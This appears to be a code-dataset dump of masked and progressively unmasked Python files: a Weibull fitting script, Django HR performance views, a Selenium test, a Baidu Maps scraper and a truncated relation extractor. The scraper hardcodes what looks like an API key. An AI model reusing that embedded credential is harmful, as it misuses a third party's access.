f_prime = ff_prime / fg - ff / fg * fg_prime / fg + 1.0 / (k * k)
k -= f / f_prime
if np.isnan(f):
return np.nan, np.nan
if abs(k - k_t_1) < eps:
break
k_t_1 = k
lam = np.mean(x ** k) ** (1.0 / k)
return k, lam
<mask token>
| <mask token>
def fit(x, iters=1000, eps=1e-06):
"""
Fits a 2-parameter Weibull distribution to the given data using maximum-likelihood estimation.
:param x: 1d-ndarray of samples from an (unknown) distribution. Each value must satisfy x > 0.
:param iters: Maximum number of iterations
    :param eps: Stopping criterion. Fit is stopped if the change between two iterations is smaller than eps.
:return: Tuple (Shape, Scale) which can be (NaN, NaN) if a fit is impossible.
Impossible fits may be due to 0-values in x.
"""
ln_x = np.log(x)
k = 1.0
k_t_1 = k
for t in range(iters):
x_k = x ** k
x_k_ln_x = x_k * ln_x
ff = np.sum(x_k_ln_x)
fg = np.sum(x_k)
f = ff / fg - np.mean(ln_x) - 1.0 / k
ff_prime = np.sum(x_k_ln_x * ln_x)
fg_prime = ff
f_prime = ff_prime / fg - ff / fg * fg_prime / fg + 1.0 / (k * k)
k -= f / f_prime
if np.isnan(f):
return np.nan, np.nan
if abs(k - k_t_1) < eps:
break
k_t_1 = k
lam = np.mean(x ** k) ** (1.0 / k)
return k, lam
def my_test():
weibull = np.random.weibull(2.0, 100000)
x = 2 * weibull
mle_shape, mle_scale = fit(x)
x.sort()
print(mle_shape)
print(mle_scale)
ydata = stats.weibull_min.pdf(np.linspace(0, x.max(), 10), mle_shape, 0,
mle_scale)
plt.plot(np.linspace(0, x.max(), 10), ydata, '-')
    plt.hist(x, bins=np.linspace(0, x.max(), 10), density=True, alpha=0.5)
plt.show()
<mask token>
| <mask token>
def fit(x, iters=1000, eps=1e-06):
"""
Fits a 2-parameter Weibull distribution to the given data using maximum-likelihood estimation.
:param x: 1d-ndarray of samples from an (unknown) distribution. Each value must satisfy x > 0.
:param iters: Maximum number of iterations
    :param eps: Stopping criterion. Fit is stopped if the change between two iterations is smaller than eps.
:return: Tuple (Shape, Scale) which can be (NaN, NaN) if a fit is impossible.
Impossible fits may be due to 0-values in x.
"""
ln_x = np.log(x)
k = 1.0
k_t_1 = k
for t in range(iters):
x_k = x ** k
x_k_ln_x = x_k * ln_x
ff = np.sum(x_k_ln_x)
fg = np.sum(x_k)
f = ff / fg - np.mean(ln_x) - 1.0 / k
ff_prime = np.sum(x_k_ln_x * ln_x)
fg_prime = ff
f_prime = ff_prime / fg - ff / fg * fg_prime / fg + 1.0 / (k * k)
k -= f / f_prime
if np.isnan(f):
return np.nan, np.nan
if abs(k - k_t_1) < eps:
break
k_t_1 = k
lam = np.mean(x ** k) ** (1.0 / k)
return k, lam
def my_test():
weibull = np.random.weibull(2.0, 100000)
x = 2 * weibull
mle_shape, mle_scale = fit(x)
x.sort()
print(mle_shape)
print(mle_scale)
ydata = stats.weibull_min.pdf(np.linspace(0, x.max(), 10), mle_shape, 0,
mle_scale)
plt.plot(np.linspace(0, x.max(), 10), ydata, '-')
    plt.hist(x, bins=np.linspace(0, x.max(), 10), density=True, alpha=0.5)
plt.show()
if __name__ == '__main__':
my_test()
| import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
def fit(x, iters=1000, eps=1e-06):
"""
Fits a 2-parameter Weibull distribution to the given data using maximum-likelihood estimation.
:param x: 1d-ndarray of samples from an (unknown) distribution. Each value must satisfy x > 0.
:param iters: Maximum number of iterations
    :param eps: Stopping criterion. Fit is stopped if the change between two iterations is smaller than eps.
:return: Tuple (Shape, Scale) which can be (NaN, NaN) if a fit is impossible.
Impossible fits may be due to 0-values in x.
"""
ln_x = np.log(x)
k = 1.0
k_t_1 = k
for t in range(iters):
x_k = x ** k
x_k_ln_x = x_k * ln_x
ff = np.sum(x_k_ln_x)
fg = np.sum(x_k)
f = ff / fg - np.mean(ln_x) - 1.0 / k
ff_prime = np.sum(x_k_ln_x * ln_x)
fg_prime = ff
f_prime = ff_prime / fg - ff / fg * fg_prime / fg + 1.0 / (k * k)
k -= f / f_prime
if np.isnan(f):
return np.nan, np.nan
if abs(k - k_t_1) < eps:
break
k_t_1 = k
lam = np.mean(x ** k) ** (1.0 / k)
return k, lam
def my_test():
weibull = np.random.weibull(2.0, 100000)
x = 2 * weibull
mle_shape, mle_scale = fit(x)
x.sort()
print(mle_shape)
print(mle_scale)
ydata = stats.weibull_min.pdf(np.linspace(0, x.max(), 10), mle_shape, 0,
mle_scale)
plt.plot(np.linspace(0, x.max(), 10), ydata, '-')
    plt.hist(x, bins=np.linspace(0, x.max(), 10), density=True, alpha=0.5)
plt.show()
if __name__ == '__main__':
my_test()
| import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
def fit(x, iters=1000, eps=1e-6):
"""
Fits a 2-parameter Weibull distribution to the given data using maximum-likelihood estimation.
:param x: 1d-ndarray of samples from an (unknown) distribution. Each value must satisfy x > 0.
:param iters: Maximum number of iterations
    :param eps: Stopping criterion. Fit is stopped if the change between two iterations is smaller than eps.
:return: Tuple (Shape, Scale) which can be (NaN, NaN) if a fit is impossible.
Impossible fits may be due to 0-values in x.
"""
# fit k via MLE
ln_x = np.log(x)
k = 1.
k_t_1 = k
for t in range(iters):
x_k = x ** k
x_k_ln_x = x_k * ln_x
ff = np.sum(x_k_ln_x)
fg = np.sum(x_k)
f = ff / fg - np.mean(ln_x) - (1. / k)
# Calculate second derivative d^2f/dk^2
ff_prime = np.sum(x_k_ln_x * ln_x)
fg_prime = ff
f_prime = (ff_prime / fg - (ff / fg * fg_prime / fg)) + (
1. / (k * k))
# Newton-Raphson method k = k - f(k;x)/f'(k;x)
k -= f / f_prime
if np.isnan(f):
return np.nan, np.nan
if abs(k - k_t_1) < eps:
break
k_t_1 = k
lam = np.mean(x ** k) ** (1.0 / k)
return k, lam
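# Quick self-check: fit samples drawn from a Weibull(shape=2, scale=2)
# distribution and plot the fitted density against a histogram.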
def my_test():
weibull = np.random.weibull(2.0, 100000)
x = 2 * weibull
mle_shape, mle_scale = fit(x)
x.sort()
print(mle_shape)
print(mle_scale)
# p0, p1, p2 = stats.weibull_min.fit(x, floc=0)
# print(p0, p1, p2)
ydata = stats.weibull_min.pdf(np.linspace(0, x.max(), 10), mle_shape, 0,
mle_scale)
plt.plot(np.linspace(0, x.max(), 10), ydata, '-')
    plt.hist(x, bins=np.linspace(0, x.max(), 10), density=True, alpha=0.5)  # 'density' replaces the removed 'normed' kwarg
plt.show()
if __name__ == '__main__':
my_test()
| [
1,
2,
3,
4,
5
] |
1,632 | 7c6ac2837751703ac4582ee81c29ccf67b8277bc | <mask token>
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<mask token>
| <mask token>
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<mask token>
| <mask token>
def index(request):
if not request.session.get('username'):
return HttpResponseRedirect(reverse('accounts:login'))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username=request.session['username'])
employee = Employee.objects.get(user=user.id)
return render(request, 'hrm/dashboard.html', {'employees': employees,
'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, 'employee': employee, 'user': user})
<mask token>
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Created employee and appraisal...'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<mask token>
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
perform = Performance.objects.filter(employee=employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse('hrm:hrm_index'))
return render(request, 'hrm/performance/employee_performance.html', {
'employee': employee, 'performances': perform})
<mask token>
| from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView
from accounts.models import Employee
from leave.models import ApplyLeave
from departments.models import Department, Position
from django.contrib.auth.models import User
from hrm.models import Performance
from django.urls import reverse_lazy, reverse
from hrm.forms import PerformanceForm
from django.http import HttpResponseRedirect
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from helpers.help import check_user_login
def index(request):
if not request.session.get('username'):
return HttpResponseRedirect(reverse('accounts:login'))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username=request.session['username'])
employee = Employee.objects.get(user=user.id)
return render(request, 'hrm/dashboard.html', {'employees': employees,
'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, 'employee': employee, 'user': user})
<mask token>
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Created employee and appraisal...'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<mask token>
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
perform = Performance.objects.filter(employee=employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse('hrm:hrm_index'))
return render(request, 'hrm/performance/employee_performance.html', {
'employee': employee, 'performances': perform})
<mask token>
def perfomance_notes(request, pk):
form = PerformanceForm(request.POST or None, instance=get_object_or_404
(Performance, pk=pk))
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
if request.method == 'POST':
if form.is_valid():
form.save()
messages.success(request,
'Successfully! Added notes on what you have done.')
return HttpResponseRedirect(reverse('hrm:perfom_employee'))
return render(request, 'hrm/performance/performance_notes.html', {
'form': form, 'employee': employee})
def appraisal(request, pk):
perform = Performance.objects.get(id=pk)
perform.status = 1
perform.save()
messages.success(request, 'Successfully! Appraised employee work....')
return HttpResponseRedirect(reverse('hrm:perfom_list'))
| from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView
from accounts.models import Employee
from leave.models import ApplyLeave
from departments.models import Department, Position
from django.contrib.auth.models import User
from hrm.models import Performance
from django.urls import reverse_lazy, reverse
from hrm.forms import PerformanceForm
from django.http import HttpResponseRedirect
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from helpers.help import check_user_login
# Create your views here.
def index(request):
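    # Dashboard view: headline counts plus the logged-in employee's profile.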
if not request.session.get('username'):
return HttpResponseRedirect(reverse("accounts:login"))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username = request.session['username'])
employee = Employee.objects.get(user = user.id)
return render(request, "hrm/dashboard.html",
{'employees': employees, 'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, "employee": employee, "user":user})
'''
Performance Control
'''
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = ('employee', 'start_date', 'finish_date', 'objective')
success_message = "Successfully! Created employee and appraisal..."
template_name = "hrm/performance/performance_form.html"
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = "performances"
template_name = "hrm/performance/performance_list.html"
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = ('employee', 'start_date', 'finish_date', 'objective')
success_message = "Successfully! Updated an appraisal"
context_object_name = "performance"
template_name = "hrm/performance/performance_form.html"
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = "performance"
template_name = "hrm/performance/performance_details.html"
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = "Successfully! Deleted an appraisal."
success_url = reverse_lazy("hrm:perfom_list")
template_name = "hrm/performance/performance_delete.html"
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
'''
Showing an employee's performance control
'''
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)
perform = Performance.objects.filter(employee = employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse("hrm:hrm_index"))
return render(request, "hrm/performance/employee_performance.html", {'employee': employee, 'performances': perform})
'''
Employee provides notes for their performance
'''
def perfomance_notes(request, pk):
form = PerformanceForm(request.POST or None,instance = get_object_or_404(Performance, pk=pk))
employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)
if request.method == "POST":
if form.is_valid():
form.save()
messages.success(request, "Successfully! Added notes on what you have done.")
return HttpResponseRedirect(reverse('hrm:perfom_employee'))
return render(request, "hrm/performance/performance_notes.html", {'form': form, 'employee': employee})
def appraisal(request, pk):
perform = Performance.objects.get(id = pk)
perform.status = 1
perform.save()
messages.success(request, "Successfully! Appraised employee work....")
return HttpResponseRedirect(reverse('hrm:perfom_list'))
| [
7,
12,
17,
20,
21
] |
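# --- Added example (not part of the dataset row above) ---
# The five class-based views in this record repeat an identical
# get_context_data override. A minimal sketch of factoring that into one
# mixin; EmployeeContextMixin is a hypothetical name, not in the source.
from accounts.models import Employee

class EmployeeContextMixin:
    """Adds the logged-in user's Employee record to the template context."""

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context['employee'] = Employee.objects.get(user=self.request.user.id)
        return context

# Usage sketch: class ListPerformanceView(EmployeeContextMixin, ListView): ...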
1,633 | 4e50a7a757bacb04dc8f292bdaafb03c86042e6c | <mask token>
| <mask token>
class TestCadastro(BaseTest):
<mask token>
| <mask token>
class TestCadastro(BaseTest):
def test_cadastro_com_sucesso(self):
self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)
self.campoDeTreinamento.fill_name('Everton')
self.campoDeTreinamento.fill_sobrenome('Araujo')
self.campoDeTreinamento.select_sexo_masculino()
self.campoDeTreinamento.cadastra()
time.sleep(3)
| import time
from tests.test_base import BaseTest
from pages.campo_de_treinamento_page import CampoDeTreinamentoPage
class TestCadastro(BaseTest):
def test_cadastro_com_sucesso(self):
self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)
self.campoDeTreinamento.fill_name('Everton')
self.campoDeTreinamento.fill_sobrenome('Araujo')
self.campoDeTreinamento.select_sexo_masculino()
self.campoDeTreinamento.cadastra()
time.sleep(3)
| import time
from tests.test_base import BaseTest
from pages.campo_de_treinamento_page import CampoDeTreinamentoPage
class TestCadastro(BaseTest):
def test_cadastro_com_sucesso(self):
self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)
self.campoDeTreinamento.fill_name("Everton")
self.campoDeTreinamento.fill_sobrenome("Araujo")
self.campoDeTreinamento.select_sexo_masculino()
self.campoDeTreinamento.cadastra()
time.sleep(3)
| [
0,
1,
2,
3,
4
] |
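# --- Added example (not part of the dataset row above) ---
# Hedged sketch of the page object the test assumes; the real
# CampoDeTreinamentoPage is not in this record, and the element IDs below
# are illustrative guesses, not the actual locators.
from selenium.webdriver.common.by import By

class CampoDeTreinamentoPage:
    def __init__(self, driver):
        self.driver = driver

    def fill_name(self, name):
        self.driver.find_element(By.ID, 'elementosForm:nome').send_keys(name)

    def fill_sobrenome(self, sobrenome):
        self.driver.find_element(By.ID, 'elementosForm:sobrenome').send_keys(sobrenome)

    def select_sexo_masculino(self):
        self.driver.find_element(By.ID, 'elementosForm:sexo:0').click()

    def cadastra(self):
        self.driver.find_element(By.ID, 'elementosForm:cadastrar').click()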
1,634 | 941a93c66a5131712f337ad055bbf2a93e6ec10d | <mask token>
| <mask token>
def bd_finder(qw, region, page_num):
page_size = '20'
bd_ak = 'wkEmrv7B1l0KPpi30F1G2VMx10xEdeol'
bd_url = 'http://api.map.baidu.com/place/v2/search?'
furl = (bd_url + 'q=' + qw + '&page_size=' + page_size + '&page_num=' +
        page_num + '&region=' + region + '&output=json&ak=' + bd_ak)
page = urllib2.urlopen(furl)
html = page.read()
data = json.loads(html)
w = Workbook()
ws = w.add_sheet('test')
str1 = '医院名称'
str2 = '医院地址'
str3 = '电话号码'
str4 = '维度'
str5 = '经度'
ws.write(0, 0, str1.decode('utf-8'))
ws.write(0, 1, str2.decode('utf-8'))
ws.write(0, 2, str3.decode('utf-8'))
ws.write(0, 3, str4.decode('utf-8'))
ws.write(0, 4, str5.decode('utf-8'))
count = 0
for i in data['results']:
count += 1
ws.write(count, 0, '%s' % i.get('name'))
ws.write(count, 1, '%s' % i.get('address'))
ws.write(count, 2, '%s' % i.get('telephone'))
ws.write(count, 3, '%s' % i.get('location')['lat'])
ws.write(count, 4, '%s' % i.get('location')['lng'])
w.save('test.xls')
<mask token>
| <mask token>
def bd_finder(qw, region, page_num):
page_size = '20'
bd_ak = 'wkEmrv7B1l0KPpi30F1G2VMx10xEdeol'
bd_url = 'http://api.map.baidu.com/place/v2/search?'
furl = (bd_url + 'q=' + qw + '&page_size=' + page_size + '&page_num=' +
        page_num + '&region=' + region + '&output=json&ak=' + bd_ak)
page = urllib2.urlopen(furl)
html = page.read()
data = json.loads(html)
w = Workbook()
ws = w.add_sheet('test')
str1 = '医院名称'
str2 = '医院地址'
str3 = '电话号码'
str4 = '维度'
str5 = '经度'
ws.write(0, 0, str1.decode('utf-8'))
ws.write(0, 1, str2.decode('utf-8'))
ws.write(0, 2, str3.decode('utf-8'))
ws.write(0, 3, str4.decode('utf-8'))
ws.write(0, 4, str5.decode('utf-8'))
count = 0
for i in data['results']:
count += 1
ws.write(count, 0, '%s' % i.get('name'))
ws.write(count, 1, '%s' % i.get('address'))
ws.write(count, 2, '%s' % i.get('telephone'))
ws.write(count, 3, '%s' % i.get('location')['lat'])
ws.write(count, 4, '%s' % i.get('location')['lng'])
w.save('test.xls')
for k in xrange(0, 10):
bd_finder('医院', '武汉', str(k))
| import urllib2
import json
import sys
from pyExcelerator import *
def bd_finder(qw, region, page_num):
page_size = '20'
bd_ak = 'wkEmrv7B1l0KPpi30F1G2VMx10xEdeol'
bd_url = 'http://api.map.baidu.com/place/v2/search?'
furl = (bd_url + 'q=' + qw + '&page_size=' + page_size + '&page_num=' +
        page_num + '&region=' + region + '&output=json&ak=' + bd_ak)
page = urllib2.urlopen(furl)
html = page.read()
data = json.loads(html)
w = Workbook()
ws = w.add_sheet('test')
str1 = '医院名称'
str2 = '医院地址'
str3 = '电话号码'
str4 = '维度'
str5 = '经度'
ws.write(0, 0, str1.decode('utf-8'))
ws.write(0, 1, str2.decode('utf-8'))
ws.write(0, 2, str3.decode('utf-8'))
ws.write(0, 3, str4.decode('utf-8'))
ws.write(0, 4, str5.decode('utf-8'))
count = 0
for i in data['results']:
count += 1
ws.write(count, 0, '%s' % i.get('name'))
ws.write(count, 1, '%s' % i.get('address'))
ws.write(count, 2, '%s' % i.get('telephone'))
ws.write(count, 3, '%s' % i.get('location')['lat'])
ws.write(count, 4, '%s' % i.get('location')['lng'])
w.save('test.xls')
for k in xrange(0, 10):
bd_finder('医院', '武汉', str(k))
| #!/usr/bin/env python
#coding=utf-8
#author:maohan
#date:20160706
#description: fetch information via the Baidu API and save it as an .xls file
#ver:1.0
import urllib2
import json
import sys
from pyExcelerator import *
def bd_finder(qw,region,page_num):
page_size='20'
bd_ak='wkEmrv7B1l0KPpi30F1G2VMx10xEdeol'
bd_url='http://api.map.baidu.com/place/v2/search?'
    furl=bd_url+'q='+qw+'&page_size='+page_size+'&page_num='+page_num+'&region='+region+'&output=json&ak='+bd_ak
page = urllib2.urlopen(furl)
html=page.read()
data=json.loads(html)
w=Workbook()
ws=w.add_sheet('test')
str1='医院名称'
str2='医院地址'
str3='电话号码'
str4='维度'
str5='经度'
ws.write(0,0,str1.decode('utf-8'))
ws.write(0,1,str2.decode('utf-8'))
ws.write(0,2,str3.decode('utf-8'))
ws.write(0,3,str4.decode('utf-8'))
ws.write(0,4,str5.decode('utf-8'))
# print type(data['results'])
# print len(data['results'])
count=0
for i in data['results']:
# print("名称:%-35s") %(i.get('name'))
# print("-------地址:%-35s") %(i.get('address'))
# print("-------电话:%-35s") %(i.get('telephone'))
# print("-------定位:(维度:%-10s)(经度:%-10s)") %(i.get('location')['lat'],i.get('location')['lng'])
# print (format("","100"))
count+=1
ws.write(count,0,'%s' %(i.get('name')))
ws.write(count,1,'%s' %(i.get('address')))
ws.write(count,2,'%s' %(i.get('telephone')))
ws.write(count,3,'%s' %(i.get('location')['lat']))
ws.write(count,4,'%s' %(i.get('location')['lng']))
w.save('test.xls')
for k in xrange(0,10):
bd_finder('医院','武汉',str(k))
| [
0,
1,
2,
3,
4
] |
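# --- Added example (not part of the dataset row above) ---
# Python 3 sketch of the same Baidu Place API call using requests. Passing
# parameters as a dict avoids the '&region=' -> '®ion=' HTML-entity
# corruption repaired above; 'YOUR_AK' is a placeholder, not a working key.
import requests

def bd_finder3(query, region, page_num, ak='YOUR_AK'):
    params = {'q': query, 'page_size': 20, 'page_num': page_num,
              'region': region, 'output': 'json', 'ak': ak}
    resp = requests.get('http://api.map.baidu.com/place/v2/search', params=params)
    return resp.json().get('results', [])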
1,635 | 5923a12378225fb6389e7e0275af6d4aa476fe87 | <mask token>
| <mask token>
def generate(root: Dict):
relations: List[Dict] = []
subj = DPHelper.get_subject(root)
obj = DPHelper.get_object(root)
if subj is not None and DPHelper.is_proper_noun(subj
) and obj is not None and DPHelper.is_proper_noun(obj):
if DPHelper.is_proper_noun(subj) and DPHelper.is_proper_noun(obj):
logging.log(INFO,
'============ Rooted NNP SUBJECT and NNP OBJECT =============')
subjs = get_all_nouns(subj, proper_noun=True)
objs = [get_noun_phrase(obj, proper_noun=True)]
aux_relations = sub_obj_vbroot(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
open_comp: List[Dict] = DPHelper.get_child_type(root, Relations
.OPEN_CLAUSAL_COMPLEMENT)
comp: List[Dict] = DPHelper.get_child_type(root, Relations.
CLAUSAL_COMPLEMENT)
if open_comp:
subjs = [get_noun_phrase(obj, proper_noun=True)]
objs, xcomp_relations = x_comp(open_comp[0])
relations = relations + create_relations(subjs,
xcomp_relations, objs)
elif subj is not None and DPHelper.is_proper_noun(subj):
subjs = get_all_nouns(subj, proper_noun=True)
appos_rels, appos_objs = [], []
appos_rel_objs = []
for appos in DPHelper.get_child_type(subj, Relations.APPOSITION):
a_objs, a_relations = direct_appositional_relations(appos)
relations += create_nested_relations(subjs, a_relations, a_objs)
if DPHelper.get_child_type(root, Relations.CLAUSAL_COMPLEMENT):
pass
if DPHelper.is_proper_noun(subj) and subj['link'
] == Relations.PASSIVE_NOM_SUBJECT:
logging.log(INFO,
'============= NNP PASSIVE SUBJECT ===============')
objs, aux_relations, appos = subjpass(root)
for appos_instance in appos:
relations = relations + create_relations(subjs,
appos_instance['relation'], appos_instance['obj'])
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_noun(root):
logging.log(INFO,
'============= NNP SUBJECT with NOUN ROOT ===============')
objs, aux_relations = nnroot_subj(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_verb(root) and obj is not None:
logging.log(INFO,
'============= NNP SUBJECT with VERB ROOT (NON-NNP DOBJ present) ==============='
)
objs, aux_relations = vbroot_subj_xobj(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_verb(root):
logging.log(INFO,
'============= NNP SUBJECT with VERB ROOT ===============')
objs, aux_relations = vbroot_subj(root)
relations = relations + create_nested_relations(subjs,
aux_relations, objs)
elif DPHelper.is_adjective(root):
logging.log(INFO,
'============= NNP SUBJECT with ADJ ROOT ===============')
objs, aux_relations = vbroot_subj(root)
relations = relations + create_nested_relations(subjs,
aux_relations, objs)
else:
logging.log(INFO,
'============= NNP SUBJECT with UNKNOWN STRUCTURE ==============='
)
else:
logging.log(INFO,
'============== NOUN ROOT - No Direct SUBJ and OBJ ================'
)
if subj is not None:
if subj['link'] == Relations.PASSIVE_NOM_SUBJECT:
logging.log(INFO,
'============= NESTED POSSESSIVE OF PASSIVE SUBJECT ==============='
)
subjs = subjpass_poss(subj)
if DPHelper.has_rc_modifier(root):
logging.log(INFO,
'============= RELATIVE CLAUSE MODIFIER PRESENT ==============='
)
if DPHelper.is_proper_noun(root):
subj, relations, objs = nnproot(root)
all_rel_tuples = []
for relation in relations:
rel_tuples = [(sub, relation['relation'], obj) for sub in relation[
'subjs'] for obj in relation['objs']]
all_rel_tuples += rel_tuples
return all_rel_tuples
| import logging
from logging import INFO
from typing import Dict, List
from .constants import Relations, POS
from .evaluator import *
from .general import DPHelper
from .general import *
from .utils import *
def generate(root: Dict):
relations: List[Dict] = []
subj = DPHelper.get_subject(root)
obj = DPHelper.get_object(root)
if subj is not None and DPHelper.is_proper_noun(subj
) and obj is not None and DPHelper.is_proper_noun(obj):
